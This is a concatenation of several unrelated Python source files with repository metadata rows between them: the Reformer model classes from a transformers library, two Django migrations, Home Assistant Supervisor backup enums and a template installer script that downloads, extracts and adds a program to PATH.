REFORMER_START_DOCSTRING = r"""
    Reformer was proposed in `Reformer: The Efficient Transformer <https://arxiv.org/abs/2001.04451>`__
    by Nikita Kitaev, Łukasz Kaiser, Anselm Levskaya.
    This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ sub-class.
    Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general
    usage and behavior.
    Parameters:
        config (:class:`~transformers.ReformerConfig`): Model configuration class with all the parameters of the model.
            Initializing with a config file does not load the weights associated with the model, only the configuration.
            Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
REFORMER_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
During training the input_ids sequence_length has to be a multiple of the relevant model's
chunk lengths (lsh's, local's or both). During evaluation, the indices are automatically
padded to be a multiple of the chunk length.
Indices can be obtained using :class:`transformers.ReformerTokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.__call__` for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
`What are attention masks? <../glossary.html#attention-mask>`__
position_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`, defaults to :obj:`None`):
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
:obj:`1` indicates the head is **not masked**, :obj:`0` indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
num_hashes (:obj:`int`, `optional`, defaults to :obj:`None`):
`num_hashes` is the number of hashing rounds that should be performed during
bucketing. Setting `num_hashes` overwrites the default `num_hashes` defined
in `config.num_hashes`.
For more information, see `num_hashes` in :class:`transformers.ReformerConfig`.
past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, defaults `None`):
List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
:obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
and :obj:`tuple(1)` being the previous `hidden_states` of shape
:obj:`(batch_size, sequence_length, hidden_size)`).
List of tuples that contains all previous computed hidden states and buckets (only relevant for LSH Self-Attention). Can be used to speed up sequential decoding.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the ``past_buckets_states`` of all attention layers are returned.
output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the hidden states of all layers are returned. See ``hidden_states`` under returned tensors for more detail.
return_dict (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the model will return a :class:`~transformers.file_utils.ModelOutput` instead of a
plain tuple.
"""
@add_start_docstrings(
    # FIX: the two implicitly-concatenated fragments previously produced
    # "hidden-stateswithout" (missing space)
    "The bare Reformer Model transformer outputting raw hidden-states without any specific head on top.",
    REFORMER_START_DOCSTRING,
)
class ReformerModel(ReformerPreTrainedModel):
    """Bare Reformer encoder stack (embeddings + reversible encoder) without a task head.

    During evaluation, inputs whose length is not a multiple of the least common
    multiple of the configured chunk lengths are automatically right-padded, and the
    padding is stripped from the output again.
    """

    def __init__(self, config):
        super().__init__(config)
        self.config = config
        assert (
            self.config.num_hidden_layers > 0
        ), "`config.attn_layers` is empty. Select at least one attn layer from ['lsh', 'local']"
        self.embeddings = ReformerEmbeddings(config)
        self.encoder = ReformerEncoder(config)
        self.init_weights()

    def get_input_embeddings(self):
        """Return the word embedding module."""
        return self.embeddings.word_embeddings

    def set_input_embeddings(self, value):
        """Replace the word embedding module."""
        self.embeddings.word_embeddings = value

    def _prune_heads(self, heads_to_prune):
        """ Prunes heads of the model.
            heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
            See base class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)

    @add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        tokenizer_class=_TOKENIZER_FOR_DOC,
        checkpoint="google/reformer-crime-and-punishment",
        output_type=ReformerModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        num_hashes=None,
        past_buckets_states=None,
        use_cache=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
    ):
        # resolve config-dependent defaults
        use_cache = use_cache if use_cache is not None else self.config.use_cache
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()  # noqa: F841
            device = input_ids.device
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]  # noqa: F841
            device = inputs_embeds.device
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")

        assert (
            len(input_shape) == 2
        ), "`input_ids` have be of shape `[batch_size, sequence_length]`, but got shape: {}".format(input_shape)

        if past_buckets_states is not None:
            assert not self.training, "`past_buckets_states` can only be used for inference, not for training`."

        # prepare head mask
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers, is_attention_chunked=True)

        # original sequence length for padding
        orig_sequence_length = input_shape[-1]

        # if needs padding
        least_common_mult_chunk_length = _get_least_common_mult_chunk_len(self.config)
        min_chunk_length = _get_min_chunk_len(self.config)

        must_pad_to_match_chunk_length = (
            input_shape[-1] % least_common_mult_chunk_length != 0
            and input_shape[-1] > min_chunk_length
            and past_buckets_states is None
        )

        if must_pad_to_match_chunk_length:
            padding_length = least_common_mult_chunk_length - input_shape[-1] % least_common_mult_chunk_length

            if self.training is True:
                raise ValueError(
                    "If training, sequence Length {} has to be a multiple of least common multiple chunk_length {}. Please consider padding the input to a length of {}.".format(
                        input_shape[-1], least_common_mult_chunk_length, input_shape[-1] + padding_length
                    )
                )

            # pad input
            input_ids, inputs_embeds, attention_mask, position_ids, input_shape = self._pad_to_mult_of_chunk_length(
                input_ids,
                inputs_embeds=inputs_embeds,
                attention_mask=attention_mask,
                position_ids=position_ids,
                input_shape=input_shape,
                padding_length=padding_length,
                padded_seq_length=least_common_mult_chunk_length,
                device=device,
            )

        # start index for position encoding depends on incremental decoding
        if past_buckets_states is not None:
            start_idx_pos_encodings = past_buckets_states[0][1].shape[1]
        else:
            start_idx_pos_encodings = 0

        embedding_output = self.embeddings(
            input_ids=input_ids,
            position_ids=position_ids,
            inputs_embeds=inputs_embeds,
            start_idx_pos_encodings=start_idx_pos_encodings,
        )
        encoder_outputs = self.encoder(
            hidden_states=embedding_output,
            head_mask=head_mask,
            attention_mask=attention_mask,
            num_hashes=num_hashes,
            past_buckets_states=past_buckets_states,
            use_cache=use_cache,
            orig_sequence_length=orig_sequence_length,
            output_hidden_states=output_hidden_states,
            output_attentions=output_attentions,
        )
        sequence_output = encoder_outputs.hidden_states

        # if padding was applied, strip it from the output again
        if must_pad_to_match_chunk_length:
            sequence_output = sequence_output[:, :orig_sequence_length]

        past_buckets_states = encoder_outputs.past_buckets_states if use_cache else None
        hidden_states = encoder_outputs.all_hidden_states if output_hidden_states else None
        attentions = encoder_outputs.all_attentions if output_attentions else None

        if not return_dict:
            return tuple(v for v in [sequence_output, past_buckets_states, hidden_states, attentions] if v is not None)
        return ReformerModelOutput(
            last_hidden_state=sequence_output,
            past_buckets_states=past_buckets_states,
            hidden_states=hidden_states,
            attentions=attentions,
        )

    def _pad_to_mult_of_chunk_length(
        self,
        input_ids,
        inputs_embeds=None,
        attention_mask=None,
        position_ids=None,
        input_shape=None,
        padding_length=None,
        padded_seq_length=None,
        device=None,
    ):
        """Right-pad `input_ids`/`inputs_embeds` (and the matching mask / position ids)
        so the sequence length becomes a multiple of the least common multiple chunk
        length; padded positions are masked out via the attention mask."""
        logger.info(
            "Input ids are automatically padded from {} to {} to be a multiple of `config.chunk_length`: {}".format(
                input_shape[-1], input_shape[-1] + padding_length, padded_seq_length
            )
        )

        padded_input_ids = torch.full(
            (input_shape[0], padding_length), self.config.pad_token_id, device=device, dtype=torch.long,
        )

        # Extend `attention_mask`: padded positions must not be attended to
        if attention_mask is not None:
            pad_attention_mask = torch.zeros(input_shape[0], padding_length, device=device, dtype=attention_mask.dtype)
            attention_mask = torch.cat([attention_mask, pad_attention_mask], dim=-1)
        else:
            attention_mask = torch.cat(
                [
                    torch.ones(input_shape, device=device, dtype=torch.uint8),
                    torch.zeros((input_shape[0], padding_length), device=device, dtype=torch.uint8),
                ],
                dim=-1,
            )

        # Extend `input_ids` with padding to match least common multiple chunk_length
        if input_ids is not None:
            input_ids = torch.cat([input_ids, padded_input_ids], dim=-1)
            input_shape = input_ids.size()

        # Pad position ids if given
        if position_ids is not None:
            padded_position_ids = torch.arange(input_shape[-1], padded_seq_length, dtype=torch.long, device=device)
            # BUGFIX: the freshly computed `padded_position_ids` were previously discarded and
            # replaced by `position_ids.unsqueeze(0).expand(...)`, which drops the new position
            # values and is shape-incompatible with a 2-D `position_ids` tensor.
            # NOTE(review): the `arange` bounds assume `input_shape[-1] + padding_length`
            # equals `padded_seq_length` here — TODO confirm for inputs longer than one chunk.
            padded_position_ids = padded_position_ids.unsqueeze(0).expand(input_shape[0], padding_length)
            position_ids = torch.cat([position_ids, padded_position_ids], dim=-1)

        # Extend `inputs_embeds` with padding to match least common multiple chunk_length
        if inputs_embeds is not None:
            padded_inputs_embeds = self.embeddings(padded_input_ids, position_ids)
            inputs_embeds = torch.cat([inputs_embeds, padded_inputs_embeds], dim=-2)
            input_shape = inputs_embeds.size()
        return input_ids, inputs_embeds, attention_mask, position_ids, input_shape
@add_start_docstrings("""Reformer Model with a `language modeling` head on top. """, REFORMER_START_DOCSTRING)
class ReformerModelWithLMHead(ReformerPreTrainedModel):
    """Causal (decoder-only) Reformer with a language-modeling head.

    Requires ``config.is_decoder=True`` and zero "after"-chunks for both local
    and LSH attention so that the causal mask is valid.
    """

    def __init__(self, config):
        super().__init__(config)
        assert config.is_decoder, "If you want to use `ReformerModelWithLMHead` make sure that `is_decoder=True`."
        assert (
            "local" not in self.config.attn_layers or config.local_num_chunks_after == 0
        ), f"If causal mask is enabled, make sure that `config.local_num_chunks_after` is set to 0 and not {config.local_num_chunks_after}."
        # BUGFIX: the condition requires 0, but the message used to say "set to 1".
        assert (
            "lsh" not in self.config.attn_layers or config.lsh_num_chunks_after == 0
        ), f"If causal mask is enabled, make sure that `config.lsh_num_chunks_after` is set to 0 and not {config.lsh_num_chunks_after}."

        self.reformer = ReformerModel(config)
        self.lm_head = ReformerOnlyLMHead(config)

        self.init_weights()

    def get_output_embeddings(self):
        """Expose the LM projection layer for generation utilities."""
        return self.lm_head.decoder

    def tie_weights(self):
        # word embeddings are not tied in Reformer
        pass

    @add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        tokenizer_class=_TOKENIZER_FOR_DOC,
        checkpoint="google/reformer-crime-and-punishment",
        output_type=CausalLMOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids=None,
        position_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        num_hashes=None,
        past_buckets_states=None,
        use_cache=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
        labels=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for computing the sequence classification/regression loss.
            Indices should be in :obj:`[-100, 0, ..., config.vocab_size - 1]`.
            All labels set to ``-100`` are ignored (masked), the loss is only
            computed for labels in ``[0, ..., config.vocab_size]``
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        reformer_outputs = self.reformer(
            input_ids,
            position_ids=position_ids,
            attention_mask=attention_mask,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            num_hashes=num_hashes,
            past_buckets_states=past_buckets_states,
            use_cache=use_cache,
            output_hidden_states=output_hidden_states,
            output_attentions=output_attentions,
            return_dict=return_dict,
        )

        sequence_output = reformer_outputs[0]
        logits = self.lm_head(sequence_output)

        loss = None
        if labels is not None:
            # Shift so that tokens < n predict n
            shift_logits = logits[..., :-1, :].contiguous()
            shift_labels = labels[..., 1:].contiguous()
            # Flatten the tokens
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(shift_logits.view(-1, self.config.vocab_size), shift_labels.view(-1))

        if not return_dict:
            output = (logits,) + reformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return ReformerModelWithLMHeadOutput(
            loss=loss,
            logits=logits,
            past_buckets_states=reformer_outputs.past_buckets_states,
            hidden_states=reformer_outputs.hidden_states,
            attentions=reformer_outputs.attentions,
        )

    def prepare_inputs_for_generation(self, input_ids, past, **kwargs):
        """Trim inputs to the last token when a cache is present (generation step)."""
        # only last token for inputs_ids if past is defined in kwargs
        if past is not None:
            input_ids = input_ids[:, -1:]

        inputs_dict = {
            "input_ids": input_ids,
            "past_buckets_states": past,
            "use_cache": kwargs["use_cache"],
        }

        if "num_hashes" in kwargs:
            inputs_dict["num_hashes"] = kwargs["num_hashes"]

        return inputs_dict

    def _reorder_cache(self, past, beam_idx):
        """Reorder each layer's cached (buckets, hidden states) to follow beam search."""
        reord_past_buckets_states = []
        for layer_past in past:
            # buckets
            if layer_past[0] is not None:
                reord_buckets = layer_past[0].index_select(0, beam_idx)
            else:
                reord_buckets = None

            # hidden states
            reord_hidden_states = layer_past[1].index_select(0, beam_idx)
            reord_past_buckets_states.append((reord_buckets, reord_hidden_states))
        return reord_past_buckets_states
@add_start_docstrings("""Reformer Model with a `language modeling` head on top. """, REFORMER_START_DOCSTRING)
class ReformerForMaskedLM(ReformerPreTrainedModel):
    """Bi-directional Reformer encoder topped with an LM head for masked LM."""

    def __init__(self, config):
        super().__init__(config)
        # Masked LM needs bi-directional self-attention, which a decoder
        # (causally masked) configuration would break.
        assert (
            not config.is_decoder
        ), "If you want to use `ReformerForMaskedLM` make sure `config.is_decoder=False` for bi-directional self-attention."
        self.reformer = ReformerModel(config)
        self.lm_head = ReformerOnlyLMHead(config)

        self.init_weights()

    def get_output_embeddings(self):
        # Expose the LM head projection for generation / resizing utilities.
        return self.lm_head.decoder

    def tie_weights(self):
        # word embeddings are not tied in Reformer
        pass

    @add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        tokenizer_class=_TOKENIZER_FOR_DOC,
        checkpoint="google/reformer-crime-and-punishment",
        output_type=MaskedLMOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids=None,
        position_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        num_hashes=None,
        labels=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
            Labels for computing the masked language modeling loss.
            Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
            Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        reformer_outputs = self.reformer(
            input_ids,
            position_ids=position_ids,
            attention_mask=attention_mask,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            num_hashes=num_hashes,
            use_cache=False,  # no causal mask
            output_hidden_states=output_hidden_states,
            output_attentions=output_attentions,
            return_dict=return_dict,
        )

        sequence_output = reformer_outputs[0]
        logits = self.lm_head(sequence_output)

        masked_lm_loss = None
        if labels is not None:
            loss_fct = CrossEntropyLoss()  # -100 index = padding token
            masked_lm_loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))

        if not return_dict:
            # Tuple form: (loss?, logits, *encoder extras).
            output = (logits,) + reformer_outputs[1:]
            return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output

        return MaskedLMOutput(
            loss=masked_lm_loss,
            logits=logits,
            hidden_states=reformer_outputs.hidden_states,
            attentions=reformer_outputs.attentions,
        )
@add_start_docstrings(
    """Reformer Model transformer with a sequence classification/regression head on top (a linear layer
    on top of the pooled output) e.g. for GLUE tasks. """,
    REFORMER_START_DOCSTRING,
)
class ReformerForSequenceClassification(ReformerPreTrainedModel):
    """Reformer encoder plus a pooled classification/regression head."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.reformer = ReformerModel(config)
        self.classifier = ReformerClassificationHead(config)
        # A causal mask would hide the right context from the pooled token.
        if config.is_decoder is True:
            logger.warning("You might want to disable causal masking for sequence classification")

        self.init_weights()

    def tie_weights(self):
        # word embeddings are not tied in Reformer
        pass

    @add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        tokenizer_class=_TOKENIZER_FOR_DOC,
        checkpoint="google/reformer-crime-and-punishment",
        output_type=SequenceClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids=None,
        position_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        num_hashes=None,
        labels=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for computing the sequence classification/regression loss.
            Indices should be in :obj:`[0, ..., config.num_labels - 1]`.
            If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
            If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.reformer(
            input_ids,
            position_ids=position_ids,
            attention_mask=attention_mask,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            num_hashes=num_hashes,
            output_hidden_states=output_hidden_states,
            output_attentions=output_attentions,
            return_dict=return_dict,
        )

        sequence_output = outputs[0]
        logits = self.classifier(sequence_output)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                #  We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions,
        )
class ReformerClassificationHead(nn.Module):
    """Projects pooled Reformer states to sentence-level classification logits."""

    def __init__(self, config):
        super().__init__()
        # Reformer hidden states are 2 * hidden_size wide (reversible residuals).
        self.dense = nn.Linear(2 * config.hidden_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.out_proj = nn.Linear(config.hidden_size, config.num_labels)

    def forward(self, hidden_states, **kwargs):
        # Pool by taking the first token (<s>, equivalent to [CLS]).
        pooled = hidden_states[:, 0, :]
        features = self.dense(self.dropout(pooled))
        features = self.dropout(torch.tanh(features))
        return self.out_proj(features)
@add_start_docstrings(
    """Reformer Model with a span classification head on top for
    extractive question-answering tasks like SQuAD / TriviaQA ( a linear layer on
    top of hidden-states output to compute `span start logits` and `span end logits`. """,
    REFORMER_START_DOCSTRING,
)
class ReformerForQuestionAnswering(ReformerPreTrainedModel):
    """Reformer encoder with a start/end span classification head."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.reformer = ReformerModel(config)
        # 2 * config.hidden_size because we use reversible residual layers
        self.qa_outputs = nn.Linear(2 * config.hidden_size, config.num_labels)

        self.init_weights()

    def tie_weights(self):
        # word embeddings are not tied in Reformer
        pass

    @add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        tokenizer_class=_TOKENIZER_FOR_DOC,
        checkpoint="google/reformer-crime-and-punishment",
        output_type=QuestionAnsweringModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids=None,
        position_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        num_hashes=None,
        start_positions=None,
        end_positions=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
    ):
        r"""
        start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`).
            Position outside of the sequence are not taken into account for computing the loss.
        end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`).
            Position outside of the sequence are not taken into account for computing the loss.
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        reformer_outputs = self.reformer(
            input_ids,
            position_ids=position_ids,
            attention_mask=attention_mask,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            num_hashes=num_hashes,
            use_cache=False,  # no causal mask
            output_hidden_states=output_hidden_states,
            output_attentions=output_attentions,
            return_dict=return_dict,
        )

        sequence_output = reformer_outputs[0]

        logits = self.qa_outputs(sequence_output)
        # Split the joint projection into separate start/end score vectors.
        start_logits, end_logits = logits.split(1, dim=-1)
        start_logits = start_logits.squeeze(-1)
        end_logits = end_logits.squeeze(-1)

        total_loss = None
        if start_positions is not None and end_positions is not None:
            # If we are on multi-GPU, split add a dimension
            if len(start_positions.size()) > 1:
                start_positions = start_positions.squeeze(-1)
            if len(end_positions.size()) > 1:
                end_positions = end_positions.squeeze(-1)
            # sometimes the start/end positions are outside our model inputs, we ignore these terms
            ignored_index = start_logits.size(1)
            start_positions.clamp_(0, ignored_index)
            end_positions.clamp_(0, ignored_index)

            # Out-of-range targets land exactly on `ignored_index` and are skipped.
            loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
            start_loss = loss_fct(start_logits, start_positions)
            end_loss = loss_fct(end_logits, end_positions)
            total_loss = (start_loss + end_loss) / 2

        if not return_dict:
            output = (start_logits, end_logits) + reformer_outputs[1:]
            return ((total_loss,) + output) if total_loss is not None else output

        return QuestionAnsweringModelOutput(
            loss=total_loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=reformer_outputs.hidden_states,
            attentions=reformer_outputs.attentions,
        )
| [
"noreply@github.com"
] | toriving.noreply@github.com |
ef5da6990fdda1ae2e8bccf7b97fade9c5b30c57 | d11b71bd556bbb6c0deccde0122b9ce64b1069cd | /tango_with_django_project/rango/migrations/0083_auto_20150122_0318.py | 8915c75cd213d4b6bf914659e2bd216e405828bc | [] | no_license | Tanner-Stults/hello-world | eeaf8105ac51b6eb5a7ac117fa7c3aff6b3fd112 | 0f568bd73c69abad01e100e4f05a180542af5b49 | refs/heads/master | 2020-06-01T19:55:08.431395 | 2015-07-27T00:10:25 | 2015-07-27T00:10:25 | 27,045,783 | 0 | 0 | null | 2014-11-23T20:17:16 | 2014-11-23T20:09:46 | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: re-declares `WorkExperience.current`
    # as a BooleanField.
    # NOTE(review): `default=None` on a BooleanField is unusual -- presumably
    # carried over from the previous field definition; verify against the model.

    dependencies = [
        ('rango', '0082_auto_20150122_0318'),
    ]

    operations = [
        migrations.AlterField(
            model_name='workexperience',
            name='current',
            field=models.BooleanField(default=None),
        ),
    ]
| [
"jst274@cornell.edu"
] | jst274@cornell.edu |
ef5cfcba95a6606c5510682302bc8b7563f002b6 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/backups/const.py | c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 945 | py | """Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
    """Backup type enum.

    Members are ``StrEnum``s, so each compares equal to its string value
    (e.g. ``BackupType.FULL == "full"``).
    """

    FULL = "full"
    PARTIAL = "partial"
class BackupJobStage(StrEnum):
    """Backup job stage enum.

    String values are the stage identifiers a backup job passes through;
    as ``StrEnum``s they compare equal to their plain-string form.
    """

    ADDON_REPOSITORIES = "addon_repositories"
    ADDONS = "addons"
    DOCKER_CONFIG = "docker_config"
    FINISHING_FILE = "finishing_file"
    FOLDERS = "folders"
    HOME_ASSISTANT = "home_assistant"
    AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
    """Restore job stage enum.

    String values are the stage identifiers a restore job passes through;
    as ``StrEnum``s they compare equal to their plain-string form.
    """

    ADDON_REPOSITORIES = "addon_repositories"
    ADDONS = "addons"
    AWAIT_ADDON_RESTARTS = "await_addon_restarts"
    AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
    CHECK_HOME_ASSISTANT = "check_home_assistant"
    DOCKER_CONFIG = "docker_config"
    FOLDERS = "folders"
    HOME_ASSISTANT = "home_assistant"
    REMOVE_DELTA_ADDONS = "remove_delta_addons"
| [
"noreply@github.com"
] | home-assistant.noreply@github.com |
d336b48ca399ec97ad77e13b5706fb43d5df98f2 | 5e6fc89f578d368c81231fdd50693b5857042c3d | /template/setup.py | d3861b0996ffebdc86964e23c2bb6bd2c93d8dd1 | [
"Unlicense"
] | permissive | Ruthenic/rodder-repo | 9d14fe5fab278c6cc7f8c3a5a31abb4477c7f6ba | a80c4b8a6e032d0d1c21524caf7b91066575b25f | refs/heads/master | 2023-03-12T19:29:31.900411 | 2021-02-22T01:58:28 | 2021-02-22T01:58:28 | 322,481,514 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | #PLEASE NOTE: THIS FORMAT IS NOT REQUIRED TO SUBMIT TO THE MAIN REPO, NOR IS IT REQUIRED FOR RODDER TO FUNCTION. THIS IS ONLY A TEMPLATE, USABLE WITH MOST PROGRAMS
# Thanks, Drake.
# Template installer script: replace every $PLACEHOLDER (download link, file
# names, program name) before use. Downloads a tarball, extracts it under
# ~/.tmp/rodder, moves it into ~/.local/bin and appends it to PATH in ~/.profile.
import subprocess,requests,tarfile,os,shutil
dlurl = '$DOWNLOAD_LINK'  # replace with the artifact's download URL

print(">< Downloading $PROGRAM_NAME...")
# NOTE(review): the HTTP status is never checked; a failed download would be
# written to disk as-is. Consider calling `file.raise_for_status()`.
file = requests.get(dlurl)
with open(os.getenv('HOME') + '/.tmp/rodder/$DOWNLOADED_FILE', 'wb') as f:
    f.write(file.content)

print(">< Extracting $PROGRAM_NAME...")
# NOTE(review): `extractall` on an untrusted archive can write outside the
# target directory (tar path traversal); only use with trusted downloads.
with tarfile.open(os.getenv('HOME') + '/.tmp/rodder/$DOWNLOADED_FILE', 'r') as f:
    f.extractall(os.getenv('HOME') + '/.tmp/rodder')

print(">< Moving $PROGRAM_NAME to installation dir...")
shutil.move(os.getenv('HOME') + '/.tmp/rodder/$EXTRACTED_FOLDER_NAME', os.getenv('HOME') + '/.local/bin')

print(">< Adding $PROGRAM_NAME dir to $PATH")
# Appends (never rewrites) to ~/.profile, so repeated runs add duplicate lines.
with open(os.getenv('HOME') + '/.profile', 'a') as f:
    f.write('export PATH=' + os.getenv('HOME') + '/.local/bin/$EXTRACTED_FOLDER_NAME:$PATH #Created by rodder')
print(">< Done!")
| [
"mdrakea3@tutanota.com"
] | mdrakea3@tutanota.com |
5b30c3f29fb8ebe39cfce369d37ef01a2df19ef6 | b4f42d5127b3b10303b4df0f0c57cc0e546a9bd0 | /rest/migrations/0026_auto_20200819_1700.py | 58b852e9ce6617b359ed35953a8eaea827b9c989 | [
"MIT"
] | permissive | narcotis/Welbot-V2 | 8ba14db2a2722cb6f907bb96018908ffe57b5999 | 7525216b61036f62d0be0b5ebb6d3476b73323c8 | refs/heads/master | 2022-12-16T16:08:38.465029 | 2020-09-09T20:08:01 | 2020-09-09T20:08:01 | 291,740,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | # Generated by Django 3.0.8 on 2020-08-19 08:00
from django.db import migrations, models
import django.db.models.deletion
